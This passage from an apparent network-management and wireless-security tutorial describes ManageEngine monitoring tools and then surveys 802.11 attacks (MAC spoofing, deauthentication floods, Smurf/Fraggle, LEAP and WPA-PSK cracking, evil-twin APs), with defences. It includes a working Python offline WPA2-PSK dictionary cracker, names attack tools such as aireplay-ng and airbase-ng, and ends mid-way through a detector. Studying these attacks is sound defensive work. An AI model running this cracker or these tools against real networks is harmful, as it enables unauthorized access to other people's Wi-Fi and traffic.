▪ Patch compliance reports: Determine the status of patches and demonstrate patch
compliance to auditors and internal stakeholders.

MANAGED Wi-Fi
Managed WiFi provides WiFi Internet access for guests, students, customers and employees
throughout the property. The design will typically include devices such as wireless controllers,
Wireless Access Points (or WAPs), switches and extensive cabling.
Managed WiFi (Wireless LAN) provides private wireless access for employees and a public
WiFi network for guests in one fully managed, end-to-end solution. The service includes built-in
security and handles over 100 users per access point. Plus, it grows with your business, from a
single access point to a large network with thousands of access points.
• Gather insightful data to help understand foot traffic and other user behavior
• Analyze key metrics by location such as loyalty, traffic times, and visitor dwell time
• Generate traffic with targeted offers over mobile
• Empower employees to access business applications and move about freely to serve
customers using WiFi-enabled devices
• Outsource the wireless network design, configuration, installation, monitoring, and support

Managed Wi-Fi Enterprise Solutions


• Mojo Networks Cloud Wi-Fi: Harnessing the power of cloud, big data analytics and
automation, Mojo's cloud WiFi solution enables wireless networks to learn, predict, protect,
and improve automatically. Its Cognitive WiFi™ platform acts as a root cause analysis
engine and augments the network admin's ability to fill gaps in intelligence, speed and
accuracy.
• Aruba AirWave network management: Offering granular visibility into wired and wireless
networks, AirWave is a management platform designed with mobile devices and apps in
mind. By proactively monitoring the health and performance of everything connected,
AirWave gives IT the insights needed to support the digital workplace.
• Aerohive HiveManager: Aerohive designed the HiveManager network management system
for the cloud from the ground up. The result is a next-generation platform for wireless cloud
networking that reduces operational complexity and cost. HiveManager simplifies unified
management of wired and Wi-Fi access networks, combining streamlined configuration
workflows, real-time client and event monitoring, simplified troubleshooting, RF planner
tools, and API integrations.
• ManageEngine OpManager: With networks becoming more complex over time, a robust
network monitoring solution is crucial. OpManager monitors network performance, detects
faults in real time, helps troubleshoot errors and prevent downtime, supports multi-vendor
environments and scales with the network. It is described in more detail in the next
section.

MANAGEENGINE
ManageEngine offers a broad suite of IT management software: more than 90 products and
free tools to manage IT operations, from networks and servers to applications, service desk,
Active Directory, security, desktops, and mobile devices.

ManageEngine network monitoring and management tools

1. OpManager
OpManager offers comprehensive network monitoring capabilities that help you monitor
network performance, detect network faults in real time, troubleshoot errors, and prevent
downtime. Being a powerful network monitor, it supports multi-vendor IT environments and
can scale to fit your network, regardless of its size. Monitor your devices and network to gain
complete visibility and control over your entire network infrastructure.

Key Features

▪ Network Health Monitoring: Visualize and resolve WAN/ router problems. Monitor
router and interfaces, bandwidth, WAN links for availability and performance.
▪ VoIP Monitoring: Proactively monitors VoIP call quality across the WAN infrastructure
and helps troubleshoot poor VoIP performance.
▪ Network Mapping: Automatic L1/L2 network mapping to visualize and pinpoint
network outages and performance degradation.
▪ Server Monitoring: Monitor both physical and virtual servers across multiple vendor OS
such as Windows, Linux, Solaris, Unix, VMware etc.

▪ Hyper-V Monitoring: Uses WMI credentials to monitor Microsoft Hyper-V hosts and
guests in depth, with over 40 performance metrics.
▪ Process Monitoring: Monitor and manage processes that are running on discovered
devices through SNMP/ WMI/ CLI.
▪ System Health Monitoring: OpManager uses protocols such as SNMP, WMI or CLI to
monitor system resources and gather performance data.
▪ Network Monitoring Tools: A collection of OpManager tools that help perform first- and
second-level troubleshooting tasks.
▪ Windows Event Log Monitoring: Centralized eventlog monitoring to monitor critical
security logs across all windows servers and workstations in your network.
▪ Network Performance Reporting: Analyze network availability, usage trends and
performance analysis by over 100 off-the-shelf and customizable reports.
▪ Network Traffic Analysis: Helps track network bandwidth usage in real-time, help keep
tabs on the top users of bandwidth on your network and ensure business critical
applications get maximum priority.

2. NetFlow Analyzer
NetFlow Analyzer, a complete traffic analytics tool, leverages flow technologies to provide
real time visibility into the network bandwidth performance. NetFlow Analyzer is a unified
solution that collects, analyzes and reports about what your network bandwidth is being used
for and by whom. ManageEngine states that NetFlow Analyzer is used to optimize bandwidth
usage on over a million interfaces worldwide, apart from performing network forensics and
network traffic analysis.

Key Features
▪ Bandwidth Monitoring & Traffic Analysis: Monitors network bandwidth and traffic
patterns at an interface-specific level. Drills down into interface level details to discover
traffic patterns and device performance. Get real-time insight into your network
bandwidth with one-minute granularity reports.
▪ Network Forensics and Security Analysis: Detects a broad spectrum of external and
internal security threats using its Continuous Stream Mining Engine technology. Tracks
network anomalies that get past your firewall and identifies context-sensitive anomalies
and zero-day intrusions.
▪ App-centric Monitoring and Traffic Shaping: Recognizes and classifies non-standard
applications that hog network bandwidth. Reconfigure policies with traffic shaping via
ACLs or class-based policies to gain control over bandwidth-hungry applications. NetFlow
Analyzer uses Cisco NBAR for deep visibility into layer 7 traffic, recognizing applications
that use dynamic port numbers or hide behind well-known ports.
▪ Capacity Planning and Billing: Makes informed decisions on the bandwidth growth
using capacity planning reports. Measures the bandwidth growth over a period time with
long term reporting. Accurate trend over extended historic periods. Generates on-demand
billing for accounting and departmental chargebacks.
▪ Multivendor Support & Flow Technology: Collects and analyzes flows from major
vendors such as Cisco, 3Com, Juniper, Foundry Networks, Hewlett-Packard, Extreme
Networks and others. Reports on all major flow formats, including NetFlow, sFlow, cflowd,
J-Flow, Flexible NetFlow (FNF), IPFIX, NetStream and AppFlow.
▪ Monitor Voice, Video and Data effectively: Analyze IP service levels for network-
based applications and services using NetFlow Analyzer IP SLA monitor. Ensure high
level of data and voice communication quality using Cisco IP SLA technology. Keep a
tab on key performance metrics of voice and data traffic.
▪ Router traffic monitoring: Monitor your critical networking devices (routers/switches)
using flows and generate mission-critical information to ensure that your network
bandwidth is appropriately used.
▪ High Performance Reporting Engine: A powerful add-on to NetFlow Analyzer which
increases its raw data capabilities and enhances the analytical abilities of ManageEngine
NetFlow Analyzer
▪ Site-to-site traffic monitoring: View site-to-site traffic patterns in your network.
Allocate your bandwidth appropriately.
▪ Application-specific usage monitoring: View the top applications on your network.
Make sure that your applications critical to your business get maximum priority.
▪ iPhone Application support dashboard: Monitor your network traffic (LAN & WAN
traffic) on the move, from anywhere, at any time.

3. Network Configuration Management: Network Configuration Manager is a multi-vendor
network change, configuration and compliance management (NCCCM) solution for
switches, routers, firewalls and other network devices. NCM helps automate and take total
control of the entire life cycle of device configuration management.

Key Features

▪ Configuration Management: Backup device configurations, maintain history, compare
versions & upload changes, all from a centralized web GUI
▪ Real-time Change Tracking: Monitors configuration changes, sends instant notifications
and helps prevent unauthorized changes.
▪ Compliance Auditing: Defines standard practices and policies and automatically checks
device configurations for compliance.
▪ Automating Configuration Tasks: Automates all repetitive, time-consuming
configuration management tasks. Apply configuration changes in bulk.
▪ User Activity Tracking: Gets complete record of who, what and when of configuration
changes. Record actions, archive and playback
▪ Multi-vendor Support: Manage configurations of network devices from multiple
vendors such as Cisco, Juniper, HP, and more.
▪ Encrypted Storage of Configuration & Centralized Control: Network Configuration
Manager stores device configurations in encrypted form in the PostgreSQL database
bundled with the product, and can talk to devices over SSH instead of Telnet. It serves
as a secure, centralized repository of device configurations. Note that backed-up
configurations typically contain credentials (SNMP community strings, local passwords,
pre-shared keys), so access to this repository must be restricted as tightly as access to
the devices themselves.

4. OpUtils: OpUtils is a Switch Port & IP Address Management software that helps network
engineers manage their Switches and IP Address Space with ease. With its comprehensive set
of 30+ tools, it helps them to perform network monitoring tasks like detecting a rogue device
intrusion, keep a check on bandwidth usage, monitoring availability of critical devices,
backing up Cisco configuration files and more.

Key Features
▪ IP Address Management: Scan IPv4 & IPv6 subnets in the network to identify the
available and used IP Addresses.
▪ Switch Port Management: Scan all the switches in your network and map the switch
ports to devices down to its physical location.
▪ Rogue Infrastructure Detection: Identify the rogue device intrusions and block their
access.
▪ Network Monitoring tools: Monitor the critical servers in the network for
availability and alert for immediate attention.

WIRELESS ENTERPRISE ATTACKS
Wireless Fidelity (Wi-Fi) is the common name for wireless local area networks based on the
IEEE 802.11 family of standards. Wi-Fi is found almost everywhere: at home, at work, in
hotels, restaurants and even in taxis, trains or planes. 802.11 radios operate in the unlicensed
2.4 GHz ISM band or the 5 GHz band, and compatible devices are cheap and readily available.
Because 802.11 networks are used so heavily in every kind of environment, they are also the
most studied wireless technology from a security point of view.
The following table summarizes the current 802.11 standards that are used in our times:

Standard   Band             Max data rate (theoretical)
802.11     2.4 GHz          2 Mbps
802.11a    5 GHz            54 Mbps
802.11b    2.4 GHz          11 Mbps
802.11g    2.4 GHz          54 Mbps
802.11n    2.4 or 5 GHz     600 Mbps
802.11ac   5 GHz            1 Gbps and above (spec maximum about 6.9 Gbps)

DIFFERENT TYPES OF ATTACKS

Following are the frequently occurring wireless network attacks:


1. Access Control Attacks
2. Integrity Attacks
3. Confidentiality Attacks
4. DOS Attack
▪ Layer 1 DOS
▪ Layer 2 DOS
▪ Layer 3 DOS
5. Authentication Attacks
6. Rogue Access Point Attacks
7. Client Misassociation
8. Misconfigured Access Point Attacks
9. Ad-Hoc Connection Attacks

Access Control Attack
The concept of access control is about controlling who has access to the network and who
does not: it prevents malicious (unauthorized) third parties from associating with the wireless
network. Access control is closely related to authentication, but the two concepts are
complementary. Authentication is most often based on a set of credentials (username and
password); access control may go beyond that and verify other characteristics of the user or
of the user's device.
A well-known access control mechanism in wireless networks is MAC address whitelisting:
the AP stores a list of authorized MAC addresses that are allowed to join the wireless
network. With the tools available today this mechanism is weak, since the MAC address
(the hardware address of the wireless client's chipset) can be spoofed trivially, for example
with macchanger or a single ip link command on Linux.
The only challenge for the attacker is to learn which MAC addresses the AP accepts. Because
the wireless medium is shared, anyone can sniff the traffic flowing through the air and read
the MAC addresses in the frames carrying valid data traffic: they sit in the 802.11 header,
which is never encrypted, even on a WPA2 network.
The attacker does not have this information at the beginning, but since the medium is "open"
for sniffing, a card in monitor mode with Wireshark or airodump-ng lists the clients that are
connected and talking to the AP at a given moment, and one of those addresses can then be
cloned.
Specialized authentication servers (device profiling or fingerprinting) can tell whether a
particular client is a PC made by HP, an iPhone from Apple (and which model) or some other
wireless client, simply by looking at how the wireless frames from that client are built and
comparing them against a set of known per-vendor "baselines". This is not something you
will see on home networks: such solutions are expensive and require a more complex
infrastructure integrating several types of servers, so they are mostly met in corporate
environments.

Integrity Attack
Integrity of the information is a characteristic that ensures that data was not tampered, when
going from point A to point B over the network (either wireless or wired). When speaking about
wireless communication, 802.11 radios can be overheard by any 3rd party on the same frequency
channel. A simple type of attack against integrity of the information is illustrated in the following
diagram:

Imagine that a legitimate wireless client is logging in to its e-mail service and has to send
sensitive credentials to the provider.
Assuming the information is not properly encrypted (or the attacker has broken the encryption
and can read everything in clear text), the wireless attacker reads the whole packet as it flows
through the air to the AP, modifies the message by swapping the credentials for its own, and
re-injects the modified message so that it goes out to the Internet via the AP.
If there are no integrity checks that would detect a change in the content of the message, the
service would accept the modified request and the legitimate user would probably lose
control of the account. The scenario as described would be hard to carry out in practice,
because mail services protect themselves against exactly this with TLS (which provides both
encryption and message integrity), but it illustrates the concept of the attack well.
There are two main countermeasures against this type of integrity attack: encryption (so that
the attacker cannot read the message at all) and Message Integrity Codes (MICs). A MIC is a
keyed integrity check: the sender computes a short tag over the whole frame using a key that
only the two ends know (in 802.11i this is Michael for TKIP and the CBC-MAC inside CCMP
for WPA2), and the receiver recomputes it. Any change to the frame content changes the tag,
so the tampered frame fails the check and is discarded by the AP or client. A plain, unkeyed
hash such as MD5 (128 bits) or SHA-1 (160 bits) would not do: an attacker who can modify
the frame can just as easily recompute the hash over the modified content.
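The difference between an unkeyed hash and a keyed MIC, as an added Python example written for this report (it is not code from any vendor or tool mentioned here): the attacker rewrites the credentials in a frame, and the receiver checks the frame once with a plain SHA-1 and once with a keyed HMAC-SHA1 standing in for the 802.11i MIC. The frame payload and the 16-byte MIC key are constructed for the demonstration; in a real WPA2 session the key comes out of the 4-way handshake.

```python
import hashlib
import hmac

# Constructed sample frame payload (made up for this example): a login request
# from the legitimate client, the thing the attacker wants to rewrite.
LEGIT_PAYLOAD = b"POST /login user=alice&pass=S3cret!"

# Assumption: the MIC key is a 16-byte secret held only by client and AP. In a
# real WPA2 network it is derived in the 4-way handshake; fixed here so the
# example is reproducible.
MIC_KEY = bytes.fromhex("000102030405060708090a0b0c0d0e0f")


def unkeyed_tag(payload: bytes) -> bytes:
    """A plain hash (SHA-1 here; MD5 would behave the same): no secret involved."""
    return hashlib.sha1(payload).digest()


def keyed_mic(key: bytes, payload: bytes) -> bytes:
    """A real MIC is keyed. HMAC-SHA1 truncated to 16 bytes stands in for the
    802.11i constructions (Michael for TKIP, CBC-MAC inside CCMP)."""
    return hmac.new(key, payload, hashlib.sha1).digest()[:16]


def receiver_check_unkeyed(payload: bytes, tag: bytes) -> bool:
    return hmac.compare_digest(unkeyed_tag(payload), tag)


def receiver_check_mic(key: bytes, payload: bytes, tag: bytes) -> bool:
    return hmac.compare_digest(keyed_mic(key, payload), tag)


def attacker_rewrite(payload: bytes) -> bytes:
    """The swap described in the text: put the attacker's username in place of
    the victim's so the service acts on the attacker's account."""
    return payload.replace(b"user=alice", b"user=mallory")


def attack_unkeyed_hash() -> bool:
    """Returns True if the receiver accepts the tampered frame."""
    forged = attacker_rewrite(LEGIT_PAYLOAD)
    forged_tag = unkeyed_tag(forged)          # no secret needed to recompute this
    return receiver_check_unkeyed(forged, forged_tag)


def attack_keyed_mic() -> bool:
    """Returns True if the receiver accepts the tampered frame."""
    tag = keyed_mic(MIC_KEY, LEGIT_PAYLOAD)   # the tag that was in the air
    forged = attacker_rewrite(LEGIT_PAYLOAD)
    # Without MIC_KEY the attacker cannot produce a matching tag; the best it
    # can do is replay the original one with the modified content.
    return receiver_check_mic(MIC_KEY, forged, tag)


def single_bit_flip_detected() -> bool:
    """Even a one-bit change anywhere in the frame fails the keyed check."""
    tag = keyed_mic(MIC_KEY, LEGIT_PAYLOAD)
    flipped = bytearray(LEGIT_PAYLOAD)
    flipped[-1] ^= 0x01
    return not receiver_check_mic(MIC_KEY, bytes(flipped), tag)


if __name__ == "__main__":
    print("unkeyed hash, tampered frame accepted:", attack_unkeyed_hash())       # True
    print("keyed MIC, tampered frame accepted:", attack_keyed_mic())             # False
    print("keyed MIC catches a single flipped bit:", single_bit_flip_detected())  # True
```

The truncation to 16 bytes mirrors what 802.11 does with its MICs; the security comes from the key, not from the tag length, which is why the unkeyed variant fails regardless of whether SHA-1 or a stronger hash is used.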

Confidentiality Attack
The role of attacks targeting the confidentiality of the information, is simply to break the
encryption model used in the wireless deployment. Looking at variety of security models in the
field the following general recommendations may be put:
• No Encryption / WEP Encryption – These are not secure and should not be used under any
circumstances; WEP keys can be recovered in minutes with aircrack-ng.
• TKIP Encryption – This is the encryption used in WPA. Practical attacks against it have
been published since 2008 (the Beck-Tews attack on its MIC and per-packet keying) and it
is deprecated; it is built on the weak RC4 stream cipher and should be treated as legacy.

• CCMP Encryption – This is used with WPA2 and is still considered the safest model. It is
based on AES, against which no practical attack is known. In PSK deployments the weak
point is not the cipher but the passphrase, which can be attacked offline (see Authentication
Attack below).

The main goal of all kinds of attacks is to break the encryption and get a value of the key. This
would give the attacker 2 things: broken confidentiality of other users and direct access to the
wireless network.

Denial of Service Attack

The attacks which are directed at disabling the service (making the target not available) or
degrading its performance (lowering the availability) lands under the umbrella of Denial of
Service (DoS) attacks. The cost of such an attack may be very expensive for a victim or
companies, whose business is based on e-commerce. They can count the costs of the attack in
millions of dollars, depending on the length of their web service not being available.
Wireless networks are also playing a crucial part in productivity of the employees. We all use
wireless laptops and smartphones in a workplace. With the lack of wireless network working, our
productivity is decreased.
DoS attacks on availability may be divided into 3 types:

1. Layer 1 DoS
2. Layer 2 DoS
3. Layer 3 DoS

Layer 1 DoS

This is a consequence of radio frequency interference, either intentional or unintentional. Most
often, unintentional interference is seen on the 2.4 GHz band, since it is very busy: devices
such as RF video cameras, cordless phones or microwave ovens use this band. As for
intentional interference, RF jammers can disrupt 802.11 WLANs. A true jammer is a hardware
unit that transmits noise on the channel; software tools advertised as jammers (for example
the Wi-Fi jammer module of the Websploit framework in Kali Linux) in practice flood
deauthentication frames, which is the Layer 2 attack described next rather than RF jamming.

Layer 2 DoS

These attacks are the ones most likely to be launched by a malicious attacker. The main idea is
to tamper with 802.11 wireless frames and inject (or retransmit) them into the air.
The most common Layer 2 DoS attacks involve spoofing of disassociation or deauthentication
management frames. The reason they are so effective is that these frames are not requests but
notifications: in networks without 802.11w they carry no authentication, so a client has no
way to tell a forged one from a real one and simply obeys.

Because authentication is a prerequisite for association (as illustrated above), a
deauthentication frame automatically disassociates the client as well.
This kind of attack can be started with the aireplay-ng tool from the aircrack-ng suite, which
by default sends its forged deauthentication frames to the broadcast address so that every
client of the AP is disconnected at once.

The mitigation for this class of attack is the 802.11w-2009 standard, Management Frame
Protection (MFP, also called Protected Management Frames, PMF). With it, disassociation
and deauthentication frames exchanged after the key handshake are integrity-protected with
keys derived during association (unicast frames with the pairwise key, broadcast ones with a
separate group integrity key), so a forged frame from an attacker who does not hold the keys
fails the check and is discarded. Two caveats: both the AP and the client must support and
negotiate it, and management frames sent before the keys exist (for example against a client
that is still in the middle of associating) are not covered.

Layer 3 DoS

The idea of a Layer 3 DoS is to overwhelm the host with a larger volume of traffic than it can
process, exhausting its resources or crashing it. Most often, this type of attack originates from
a set of attacker-controlled hosts, called a botnet, and targets a victim server on the Internet.
The three most common types of Layer 3 DoS attacks are:

Fraggle Attack

The attacker sends a large number of UDP echo (port 7) or chargen (port 19) requests to an IP
broadcast address. The source IP address is spoofed and set to the victim's IP address, so all
the replies generated by the hosts on the broadcast subnet are sent to the victim.

Ping Flood Attack

The attacker sends a large number of ICMP echo request packets to the target computer using
ping. Imagine a malicious party that owns a botnet of thousands of PCs: a ping flood running
from all of them at the same time becomes serious.

Smurf Attack

Exactly the same step-by-step operation as the Fraggle attack; the only difference is that the
Smurf attack uses ICMP echo request packets whereas Fraggle uses UDP packets.
These Layer 3 DoS attacks are not specific to wireless technology. They can be used over any
Layer 2 technology: Ethernet, Frame Relay, ATM or wireless. The main requirement for the
attack to succeed is that the attacker controls a large number of compromised PCs (a botnet)
or, for Smurf and Fraggle, finds networks that still answer broadcast requests from outside
(directed broadcast is disabled by default on modern routers, which is why these two
amplification attacks are rare today). With a botnet of 1000+ devices the cumulative traffic
can be significant; a Layer 3 DoS from a single PC is not effective at all.
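A collector-side check for the Smurf and Fraggle reflection pattern, added here as an example and not part of the original report or of any of the NetFlow products described earlier. It runs over constructed flow records (source, destination, protocol, ports, ICMP type, packet count, all made up for the example) and flags a destination that receives echo replies from many distinct hosts it never sent requests to; the record layout, the reflector ports and the threshold are assumptions.

```python
from collections import defaultdict

ECHO_REPLY, ECHO_REQUEST = 0, 8
REFLECTOR_PORTS = {7, 19}      # UDP echo and chargen, the classic Fraggle services

# Constructed flow records, made up for this example:
# (src, dst, proto, sport, dport, icmp_type, packets).
# A real deployment would read them from a NetFlow/sFlow/IPFIX collector.
VICTIM = "203.0.113.10"


def sample_flows():
    flows = []
    # Smurf: every host on 198.51.100.0/24 answers an echo request that carried
    # the victim's spoofed source address, so the replies land on the victim.
    for host in range(1, 201):
        flows.append((f"198.51.100.{host}", VICTIM, "icmp", 0, 0, ECHO_REPLY, 500))
    # Fraggle: the same subnet answering a spoofed UDP echo (port 7) broadcast.
    for host in range(1, 121):
        flows.append((f"198.51.100.{host}", VICTIM, "udp", 7, 40000, None, 300))
    # Legitimate traffic: the victim pings one host and gets one reply back.
    flows.append((VICTIM, "192.0.2.5", "icmp", 0, 0, ECHO_REQUEST, 4))
    flows.append(("192.0.2.5", VICTIM, "icmp", 0, 0, ECHO_REPLY, 4))
    return flows


def is_request(flow):
    _, _, proto, _, dport, icmp_type, _ = flow
    return (proto == "icmp" and icmp_type == ECHO_REQUEST) or \
           (proto == "udp" and dport in REFLECTOR_PORTS)


def is_reply(flow):
    _, _, proto, sport, _, icmp_type, _ = flow
    return (proto == "icmp" and icmp_type == ECHO_REPLY) or \
           (proto == "udp" and sport in REFLECTOR_PORTS)


def detect_reflection(flows, min_reflectors=20):
    """Flag hosts that receive echo replies from many distinct sources they never
    sent requests to. That is the signature of Smurf (ICMP) and Fraggle (UDP):
    the victim sees answers to questions it did not ask."""
    solicited = set()                     # (replier, requester) pairs seen as requests
    for flow in flows:
        if is_request(flow):
            solicited.add((flow[1], flow[0]))
    sources = defaultdict(lambda: defaultdict(set))   # victim -> proto -> reflectors
    packets = defaultdict(lambda: defaultdict(int))
    for flow in flows:
        src, dst, proto, _, _, _, pkts = flow
        if is_reply(flow) and (src, dst) not in solicited:
            sources[dst][proto].add(src)
            packets[dst][proto] += pkts
    alerts = []
    for victim, per_proto in sources.items():
        for proto, reflectors in per_proto.items():
            if len(reflectors) >= min_reflectors:
                # Reflectors of one Smurf/Fraggle wave share a broadcast domain;
                # summarising them by /24 points at the misconfigured amplifier.
                subnets = {".".join(ip.split(".")[:3]) + ".0/24" for ip in reflectors}
                alerts.append({
                    "victim": victim,
                    "attack": "smurf" if proto == "icmp" else "fraggle",
                    "reflectors": len(reflectors),
                    "packets": packets[victim][proto],
                    "amplifier_subnets": sorted(subnets),
                })
    return alerts


if __name__ == "__main__":
    for alert in detect_reflection(sample_flows()):
        print(alert)
```

The "solicited" set is what separates a reflection attack from a busy host that simply pings a lot: the victim of Smurf or Fraggle never sent the requests, because the attacker sent them with the victim's address as source.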

Authentication Attack
As you probably know by now, authentication is the method of verifying a presented identity
and its credentials. Most of the authentication schemes used in wireless setups are protected
with proper encryption.
In WPA/WPA2-PSK no EAP is involved: the passphrase is the only secret, and the client and
the authenticator (AP) run a 4-way handshake to derive the session keys from it. By sniffing
that handshake, an attacker can mount an offline brute-force or dictionary attack: for each
candidate passphrase the keys are derived and checked against the MIC seen in the handshake,
so the AP is never contacted and nothing limits the guess rate except CPU/GPU speed. A long,
random passphrase is the only defence.
Another example is LEAP (Lightweight Extensible Authentication Protocol), a Cisco scheme
once used to generate dynamic WEP keys. In LEAP the password itself never goes over the air,
but the MS-CHAP (version 1) challenge/response derived from it does, and that exchange is
crackable with an offline dictionary attack (the asleap tool was written for exactly this). An
authentication attack on LEAP consists of the following steps:

1. The username is sent in clear text.
2. The challenge is sent in clear text.
3. The response is a function of the password and the challenge (the NT hash of the
password, DES-encrypted over the challenge).
4. An offline dictionary or pure brute-force attack (for example with asleap; aircrack-ng
covers the WPA-PSK case) tries candidate passwords in the formula
function(password, challenge) = response until one matches.
5. Password dictionaries can be downloaded from the Internet or generated with tools such
as cewl (word lists) or rtgen/winrtgen (rainbow tables).
6. Such attacks may take a long time, and they fail if the real password is not in the
dictionary or is too long to brute-force, which is why the strength of the password
decides the outcome.
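The offline dictionary attack on a captured WPA2-PSK 4-way handshake, as an added Python example (not code from this report or from aircrack-ng, although it reproduces the same derivation that tool performs). The handshake fields (SSID, both MAC addresses, both nonces and EAPOL message 2) are constructed inside the block from a known passphrase so that it runs offline; in a real engagement they come out of a capture. The wordlist is made up too.

```python
import hashlib
import hmac
import struct

PRF_LABEL = b"Pairwise key expansion"
MIC_OFFSET = 81     # EAPOL header (4) + key descriptor fields (77) up to the MIC


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    These 4096 iterations are the only thing slowing each guess down."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce) -> bytes:
    """PTK = PRF-512(PMK, label, min(AA,SPA) || max(AA,SPA) || min(AN,SN) || max(AN,SN)).
    KCK is the first 16 bytes, KEK the next 16, TK the next 16."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, PRF_LABEL + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes, key_data: bytes) -> bytes:
    """Minimal EAPOL-Key message 2 (client -> AP) in the 802.11i layout."""
    body = struct.pack("!BHH", 2, 0x010A, 0)     # descriptor RSN; key info: v2, pairwise, MIC; key length
    body += (1).to_bytes(8, "big")                # replay counter
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
    body += mic + struct.pack("!H", len(key_data)) + key_data
    return struct.pack("!BBH", 1, 3, len(body)) + body   # EAPOL version 1, type EAPOL-Key


def constructed_capture(true_passphrase: str = "password123") -> dict:
    """Stand-in for a sniffed handshake (constructed, not a real capture). The MIC
    is generated here from a known passphrase; a real attack reads all of these
    fields from messages 1 and 2 of the captured 4-way handshake."""
    ssid = b"CorpWiFi"
    ap_mac, sta_mac = bytes.fromhex("00112233aabb"), bytes.fromhex("66778899ccdd")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")   # CCMP / PSK
    kck = ptk_from_pmk(pmk_from_passphrase(true_passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, build_msg2(snonce, b"\x00" * 16, rsn_ie))
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol_msg2": build_msg2(snonce, mic, rsn_ie)}


def crack(capture: dict, wordlist):
    """Offline dictionary attack: derive PMK -> PTK -> KCK for each guess and compare
    the MIC we compute with the MIC carried in the captured message 2."""
    seen_mic = capture["eapol_msg2"][MIC_OFFSET:MIC_OFFSET + 16]
    for guess in wordlist:
        pmk = pmk_from_passphrase(guess, capture["ssid"])
        kck = ptk_from_pmk(pmk, capture["ap_mac"], capture["sta_mac"],
                           capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol_msg2"]), seen_mic):
            return guess
    return None


if __name__ == "__main__":
    words = ["letmein", "Summer2018", "corpwifi2018", "password123", "qwerty"]   # constructed wordlist
    print("recovered passphrase:", crack(constructed_capture(), words))
```

Because the PMK depends on the SSID as well as the passphrase, rainbow tables only help for common SSIDs, and the 4096 PBKDF2 iterations per guess are what make a long random passphrase effectively uncrackable; everything else in the derivation (MACs, nonces) is public in the capture.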

Rogue Access Point Attacks
The corporate WLAN is an authorized and secured wireless portal to the network resources. A
rogue access device (AP) is any WLAN radio that is connected to the corporate network (most
often to some network switch) without the authorization.
Most of the rogue access points installed by employees (maliciously or by mistake) are not the
same APs the IT department uses, but small-office/home-office (SOHO) wireless routers, the
same ones you probably have at home. When they are misconfigured, or configured without any
security, they open a new attack surface that gives easy access to an otherwise well-secured
network.
With the current evolution of the IT industry, rogue access point might be very well hidden and
extremely hard to find.
If the network resources are exposed by a rogue access point, the following risks may be
identified:

1. Data Theft – Corporate data may be compromised.
2. Data Destruction – Databases may be erased.
3. Loss of Services – Network services can be disabled.
4. Malicious Data Insertion – An attacker may use a portal to upload viruses, key loggers.
5. 3rd Party Attacks – A company's wired network may be used as a launching pad for 3rd
party attacks against other networks across the internet.

Client Misassociation

You have probably already experienced that when you bring your PC home and use the
wireless network, it connects to the WLAN automatically without any action from you. This is
because the laptop remembers the WLANs it has connected to in the past and stores them in the
so-called Preferred Network List (in the Windows world).
A malicious hacker can abuse this default behaviour by bringing an AP of their own into the
physical area where you normally use your Wi-Fi. If the signal from that AP is stronger than the
one from the original AP, the laptop will misassociate to the fake (rogue) access point provided
by the hacker, believing it to be the legitimate AP it used in the past. These attacks are very
easy to perform in big open spaces such as airports, office environments or public areas, and
are sometimes referred to as Honeypot AP or evil twin attacks.
Creating a fake AP does not require dedicated hardware. Kali Linux, the distribution used
throughout this tutorial, ships airbase-ng, which can create an AP with a chosen MAC address
and WLAN name (SSID) with a single command.
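A small wireless intrusion detector covering two of the attacks described above, the Layer 2 deauthentication flood and the honeypot/evil-twin AP of this section, as an added Python example (not part of the original report or of any product it mentions). It builds and parses raw 802.11 management frames itself; the capture, the BSSIDs, the SSID names and the alert thresholds are constructed assumptions, and a real deployment would feed it frames from a monitor-mode interface instead.

```python
from collections import defaultdict, deque

BROADCAST = b"\xff" * 6
SUBTYPE_BEACON, SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 8, 10, 12

# Constructed addresses (made up for this example): two corporate APs, one rogue.
AP1, AP2 = bytes.fromhex("00112233aa01"), bytes.fromhex("00112233aa02")
ROGUE = bytes.fromhex("deadbeef0001")
AUTHORIZED = {"CorpWiFi": {AP1, AP2}}      # SSID -> BSSIDs allowed to advertise it


def mgmt_frame(subtype, da, sa, bssid, body=b""):
    """Minimal 802.11 management frame: frame control (version 0, type 0),
    duration, addr1/addr2/addr3, sequence control, body."""
    return bytes([subtype << 4, 0x00]) + b"\x00\x00" + da + sa + bssid + b"\x00\x00" + body


def beacon(bssid, ssid):
    fixed = b"\x00" * 8 + b"\x64\x00" + b"\x11\x04"      # timestamp, interval, capability
    return mgmt_frame(SUBTYPE_BEACON, BROADCAST, bssid, bssid,
                      fixed + bytes([0, len(ssid)]) + ssid.encode())   # SSID IE (tag 0)


def deauth(bssid, target=BROADCAST, reason=7):
    return mgmt_frame(SUBTYPE_DEAUTH, target, bssid, bssid, reason.to_bytes(2, "little"))


def parse_mgmt(frame):
    """Return the fields a WIDS needs, or None for non-management frames."""
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0:
        return None
    rec = {"subtype": (fc0 >> 4) & 0xF, "da": frame[4:10], "sa": frame[10:16], "bssid": frame[16:22]}
    body = frame[24:]
    if rec["subtype"] in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
        rec["reason"] = int.from_bytes(body[:2], "little")
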